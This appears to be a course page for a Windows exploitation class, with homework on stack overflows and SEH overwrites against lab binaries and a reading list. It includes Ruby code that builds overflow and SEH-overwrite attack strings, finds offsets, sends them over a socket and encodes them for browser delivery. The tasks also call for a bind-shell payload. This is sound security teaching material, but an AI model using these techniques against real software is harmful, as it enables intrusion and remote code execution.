Exploitation 101
Lecture
- Slides
- demo.exe source code, binary (pw: "infected" though it is not a virus), and exploit code
Homework
Exploit the vulnerability in homework-re-fall2011-v2.exe, which is a simple server very similar to the demo.exe from class.
1. Write a script to trigger the vulnerability and set EIP to a chosen value. Describe the format of the attack string that you used to trigger the vulnerability. For example, the attack string from the demo could be described as: [ 69 bytes of space ] [ EIP ]
2. Attach WinDbg to homework.exe and trigger the vulnerability. Use the !exploitable extension to analyze the crash. To do this, enter the commands below in the WinDbg command window after WinDbg has reported the exception (crash):
0:001> .load msec
0:001> !exploitable
Document the exception output from WinDbg (where it shows the values of the registers) and the output of the !exploitable command.
3. Write a complete exploit for homework.exe. You will need to find a suitable jump address with WinDbg, Immunity Debugger, or msfpescan. You should use the attached payload (in Ruby). You can write it in any language, but I'd recommend trying to use Ruby because the next homework will include converting your exploit to a Metasploit exploit module.
The homework deliverable is a Ruby script, just like demo_exploit.rb, that exploits homework.exe to bind a cmd.exe shell to TCP port 4444 (the payload included in payload.rb does this). Make sure that your return address is one that you chose randomly from the thousands of possible ones that you can find with WinDbg or Immunity Debugger. We don't want to see any duplicates in the submitted homework and definitely none with the return address used in demo_exploit.rb.
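As an added example (not the course's demo_exploit.rb or payload.rb), the three steps above as Ruby helpers: a cyclic pattern equivalent to pattern_create.rb, offset recovery from the EIP value WinDbg prints in its exception output, and the attack-string builder in the [ padding ] [ EIP ] [ NOP sled ] [ payload ] shape. The target port 9999, the jmp esp address 0x0badc0de, the observed EIP 0x37634136 and the int3 stand-in payload are placeholders, not values from the homework binary.

```ruby
require 'socket'

# Added example, not the course's demo_exploit.rb. Builds the attack string
#   [ padding up to the saved return address ] [ EIP ] [ NOP sled ] [ payload ]
# and reproduces the two Metasploit helpers used to find the padding length.

# Cyclic pattern in the style of pattern_create.rb ("Aa0Aa1Aa2..."): every
# 4-byte window is unique, so whatever lands in EIP tells you where it came from.
def pattern_create(length)
  out = +''
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Offset of the saved return address, from the EIP value in the WinDbg crash
# output. x86 reads EIP little-endian, so pack('V') restores the four pattern
# bytes in the order they were sent. Returns nil if EIP did not come from the pattern.
def pattern_offset(eip, length = 1024)
  pattern_create(length).index([eip].pack('V'))
end

# Attack string. The NOP sled gives a "jmp esp" some slack if ESP does not
# point exactly at the byte after the overwritten return address.
def build_attack_string(offset, jmp_esp, payload, sled: 16)
  buf = ''.b
  buf << 'A'.b * offset
  buf << [jmp_esp].pack('V')
  buf << "\x90".b * sled
  buf << payload.b
  buf
end

# Bytes a line-oriented text server typically truncates on or rewrites;
# check the whole string, not just the payload, before sending it.
BAD_CHARS = [0x00, 0x0a, 0x0d].freeze

def bad_chars(buf)
  buf.bytes.uniq & BAD_CHARS
end

def send_attack(host, port, buf)
  TCPSocket.open(host, port) { |s| s.write(buf) }
end

if __FILE__ == $PROGRAM_NAME
  host = '127.0.0.1'
  port = 9999            # assumption: the homework server's listening port
  jmp_esp = 0x0badc0de   # placeholder: use an address you found with msfpescan or WinDbg

  # Step 1: crash the server with the pattern and read eip=... from WinDbg:
  #   send_attack(host, port, pattern_create(1024))
  eip = 0x37634136       # constructed value standing in for the one WinDbg shows
  offset = pattern_offset(eip)
  puts "saved return address is #{offset} bytes into the input"

  # Step 2: confirm control with int3s under the debugger before using payload.rb.
  buf = build_attack_string(offset, jmp_esp, "\xcc".b * 4)
  bad = bad_chars(buf)
  abort "attack string contains bad bytes: #{bad.inspect}" unless bad.empty?
  begin
    send_attack(host, port, buf)
  rescue SystemCallError, SocketError, IOError => e
    warn "could not reach #{host}:#{port}: #{e.message}"
  end
end
```

Run it once with the pattern to get the crash, feed the reported EIP to pattern_offset, then swap the int3 stand-in for the bytes in payload.rb. The bad-byte check matters because the jump address you pick must also survive the server's input handling, not only the payload.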
Required Reading
- The Tao of Windows Buffer Overflows by DilDog (required)
- Low-level Software Security: Attacks and Defenses (because you didn't read it the first time)
Exploitation 102
Lecture
Homework
The homework this week is to write a basic browser exploit. The homework2.zip file contains JavaScript to trigger two vulnerabilities in the Vulnerable.ocx ActiveX control as well as a payload for you to execute. The first vulnerability is a basic stack overflow. The second vulnerability is protected with /GS and requires the abuse of a structured exception handler (SEH) record to exploit. Students are required to write an exploit for only the first flaw, the second is extra credit worth an entire extra homework.
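The second flaw is the one /GS does not stop: the cookie is only checked when the function returns, but an overflow that also clobbers the SEH record higher on the stack and then keeps writing until it faults gets its handler called by the exception dispatcher before that check ever runs. As an added example that is not part of homework2.zip, here is the SEH-overwrite layout in Ruby, plus a helper that turns the bytes into the %uXXXX form JavaScript's unescape() accepts. The pop/pop/ret address 0x12345678 and the int3 payload are placeholders.

```ruby
# Added example, not from homework2.zip. Attack string for an SEH overwrite:
#   [ padding to nSEH ] [ nSEH: short jmp +6 ] [ SEH: pop/pop/ret ] [ NOP sled ] [ payload ]
# When the fault is dispatched, the overwritten handler (pop/pop/ret) runs;
# the second pop discards two stack slots and ret lands on the address of the
# EXCEPTION_REGISTRATION record, i.e. on nSEH, whose short jump skips the
# 4-byte handler pointer and lands in the sled.
def seh_attack_string(offset, pop_pop_ret, payload, sled: 16)
  buf = ''.b
  buf << 'A'.b * offset
  buf << "\xeb\x06\x90\x90".b      # nSEH: jmp short +6 over the SEH pointer
  buf << [pop_pop_ret].pack('V')   # SEH: address of pop reg; pop reg; ret
  buf << "\x90".b * sled
  buf << payload.b
  buf
end

# Encode raw bytes as the %uXXXX units consumed by unescape(). Each 16-bit
# unit is stored little-endian in memory, so "\xeb\x06" becomes %u06eb.
# An odd trailing byte is padded with a NOP so no unit is left half filled.
def to_unescape(bytes)
  bytes = bytes.b
  bytes << "\x90".b if bytes.bytesize.odd?
  bytes.unpack('v*').map { |w| format('%%u%04x', w) }.join
end

if __FILE__ == $PROGRAM_NAME
  ppr = 0x12345678                       # placeholder pop/pop/ret, find a real one in a non-SafeSEH module
  buf = seh_attack_string(100, ppr, "\xcc".b * 4)
  puts "var s = unescape(\"#{to_unescape(buf)}\");"
end
```

Find the distance to nSEH the same way as for the plain overflow (send a pattern, then read the clobbered record with WinDbg's !exchain), and take the pop/pop/ret from a module loaded without SafeSEH, since a SafeSEH module will refuse a handler address that is not in its registered table. The whole string still has to avoid the control's bad bytes once it passes through unescape().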
References
Tutorials, Challenges, and Walkthroughs
- Debugging Fundamentals for Exploit Development
- Smashing the Stack in 2010 by Andrea Cugliari and Mariano Graziano
- Advanced Windows Buffer Overflows (AWBOs)
- Guide to the AWBOs
- Gera's Insecure Programming by Example
- Peter Van Eeckhoutte's Exploit Writing Tutorials
- Ken Ward Zipper Stack BOF 0day
- MS08-067 - Sourcefire Vulnerability Research Team Report
- FoxIt Reader Stack Overflow Exploit: Egghunter Edition
- From 0x90 to 0x4c454554
- SEH Based Overflow Exploit Tutorial
Shellcode
- A collection of win32 shellcode
- Windows System Call Table
- Win32 Assembly Components by LSD
- UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes by LSD
Exploitation Techniques
- Return-Oriented Programming: Exploits Without Code Injection
- A gentle introduction to return-oriented programming
- Pwn2Own 2010 Windows 7 Internet Explorer 8 Exploit
- Exploitation with WriteProcessMemory
- ASLR Smack & Laugh Reference
- Linux GLibC Stack Canary Values
- Exploitation Techniques from IT Sec Catalog
- The narly WinDBG extension by d0c s4vage
- The viscope WinDBG extension by Jeon Wook Oh
Mitigations
- Using Hardening Options - Debian Wiki
- Ubuntu Security Features by release
- Assessing the Tux Strength: Part 1 - Userspace Memory Protections
- Assessing the Tux Strength: Part 2 - Into the Kernel
- Windows ISV Software Security Defenses
- Chapter 1 of the Mac Hacker's Handbook (see pages 21-29)
Metasploit
- Offensive Security's Metasploit Unleashed open course, particularly Porting Exploits (essential)
- Metasploit Wiki: Exploit Module Dev (essential)
If you passed this section with ease and understand most of the reading material above, you might want to try taking Immunity's Network Offense Professional certification. Good luck!
Archive
Fall 2010
The first homework was to find and exploit the security vulnerability in homework.exe, which is a simple server very similar to the demo.exe (source code) from class.
Please submit your answers to the following tasks:
1. Identify the stack buffer overflow vulnerability in homework.exe using IDA Pro Freeware. Explain the cause of the vulnerability and how it may be triggered (1-2 paragraphs).
2. Write a script to trigger the vulnerability and set EIP to a chosen value. Describe the format of the attack string that you used to trigger the vulnerability. For example, the attack string from the demo could be described as: [ 69 bytes of space ] [ EIP ]
3. Attach WinDbg to homework.exe and trigger the vulnerability. Use the !exploitable extension to analyze the crash. To do this, enter the commands below in the WinDbg command window after WinDbg has reported the exception (crash):
0:001> .load msec
0:001> !exploitable
Document the exception output from WinDbg (where it shows the values of the registers) and the output of the !exploitable command.
4. Write a complete exploit for homework.exe. You may use the attached payload (in Ruby). You may write it in any language, but I'd recommend trying to use Ruby because the next homework will include converting your exploit to a Metasploit exploit module. Metasploit has been installed into the VM and you can use the command line tools from the included Cygwin Shell:
Start -> All Programs -> Metasploit3 -> Cygwin Shell
$ /msf3/tools/pattern_create.rb 1024
You can also use '/msf3/msfpescan' to find useful jump addresses. You may find that easier than using WinDbg or Immunity Debugger's search commands.
The second homework was to port your exploit for homework.exe to the Metasploit 3 framework. The framework is installed in your VM and you may use it from there or from your VM host. You should convert your exploit into a metasploit exploit module, which will be a single ruby file. Submit this single file as your solution for the homework.
To get you started on Metasploit module development, you should read the following web pages:
- Metasploit Unleashed: Porting Exploits
- Metasploit Wiki: Exploit Module Development
You can also refer to the following simple exploits that are already included in the framework:
- modules/exploits/windows/lpd/niprint.rb
- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
Fall 2009